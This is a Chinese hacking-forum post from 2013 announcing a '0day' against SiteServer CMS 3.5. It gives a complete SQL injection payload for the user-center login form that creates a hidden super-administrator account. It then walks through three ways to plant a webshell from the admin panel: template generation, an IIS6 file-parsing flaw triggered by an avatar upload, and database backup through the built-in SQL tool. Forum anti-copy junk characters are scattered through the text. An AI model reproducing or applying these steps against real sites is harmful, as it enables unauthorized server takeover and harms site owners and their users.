找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2257|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
' N" Q) z4 Z. P4 a9 Z" r
( F; D. X& t$ f% t$ mstieserver官网:www.siteserver.cn4 D; A8 T5 p  I& a* K  _! K  K/ [

9 \$ h) i5 f' W, U' {( ]( V 6 ?; C7 @" D; ]/ D- X& e
  k5 i/ Z' |. K6 ]8 r1 d
EXP:% Z9 J- n  G6 p) |/ d: D8 F. `

7 z5 _5 W9 X" t. a直接访问UserCenter/login.aspx+ O. n3 X  o+ T5 k1 x0 |
/ b& I! q5 i4 A, m( X

. i& V- z. H* q  n1 `8 Q4 F5 Y) g, ~+ ?$ o" `
用户名处输入:5 s9 Y( c. P8 M; m/ P1 m. h" `

( Y/ d1 C+ C5 k+ g) w123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--. H8 G) ^! `3 f3 ]% ]* M

$ j5 r4 q) `* I. j 5 w9 F) p; t6 \0 j  |
3 Z4 |8 O1 U" I0 o( [9 E( }% e
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。  ]" g& r& h. ]4 x' g$ L
/ L: O5 A; b: Z1 }* K; m
% ^6 v# ]% _% u$ s2 s$ t
% r6 Z" i. ?- x6 m: o! q
之后再访问后台SiteServer/login.aspx用插入的用户登陆9 c/ m( B3 ~# W/ C
1 `0 P: ?1 j5 g/ A0 w7 m' b
/ ^7 Z7 R4 Q# `- T  B
  ~# c! V$ \& i4 ^0 }
后台拿webshell的三种方法:
& M9 a0 R+ ?9 Z! c+ A; @, a, ~  I( j+ Q$ f. m& X  Q- ?  T
一、/ }# u+ _' _, q! B, w
9 o5 Y- g8 b! p5 p+ u
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx: u9 D+ I2 y6 ~3 d( j

2 @. ~2 b6 @- w+ _+ R二、
, N1 X/ v* D  V+ z- |+ r( H- a2 H0 {& t; g5 G6 E6 S0 ~* }. R
成员权限-》添加用户-》用户名为:1.asp
; P, H3 z) p6 x5 U3 R5 Q3 h  k4 C5 J& u; y3 v4 Z. e
http://127.0.0.1/usercenter/
) |+ o6 {$ Z- G9 e+ v9 B/ S! n) ~& s3 D1 a$ @. m. p9 s
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell. R3 e: Y$ x. J# z: j
& E$ m$ {$ |8 y8 y$ a" q& y. t
(ps:后台添加用户时不会验证是否含有非法字符)/ A& G5 p- w9 d* M" d& a1 f

4 X0 l) W# L* a三、: L: z3 q" G5 u, w& A$ u; U

8 [5 O) {% K3 M) b系统工具-》实用工具-》机器参数查看
% H2 T2 l, ^# _  t2 Y# u可以看到数据库类型、名称,WEB路径! u, O6 E7 X! _, C  c' N" O! V. z
- K3 X0 A% k( G
系统工具-》数据库工具-》SQL语句查询
5 b0 J! l' v' |( y这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
0 a/ |" K+ [$ n% m$ d
- K  L) C, K& w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表